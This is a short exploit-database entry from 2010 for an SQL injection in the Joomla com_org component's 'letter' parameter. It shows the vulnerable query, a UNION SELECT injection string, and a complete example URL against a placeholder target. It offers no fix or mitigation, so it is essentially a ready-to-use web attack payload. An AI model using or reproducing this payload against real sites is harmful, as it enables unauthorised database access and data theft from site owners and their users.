Joomla com_org SQL Injection Vulnerability (letter parameter)

2010-03-15
ID: 35408
CVE: None
Download vulnerable application: None
# Joomla com_org SQL Injection Vulnerability (letter parameter)
# Author: kazuya
# Mail: [email protected]<mailto:[email protected]> Jabber: [email protected]<mailto:[email protected]>
# Greetz to back2hack

# Vulnerability
# Query: SELECT count(*) FROM `jos_org` WHERE (`name` LIKE '<sql>%' || ...
# SQL: ')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f
# Example: http://[target].com/index.php?option=com_org&letter=')+union+select+0,0,0,1,0,2,0,0,0,0,0,0,0,0,0,0,0--+f&task=indexs
1-4-2 (www01)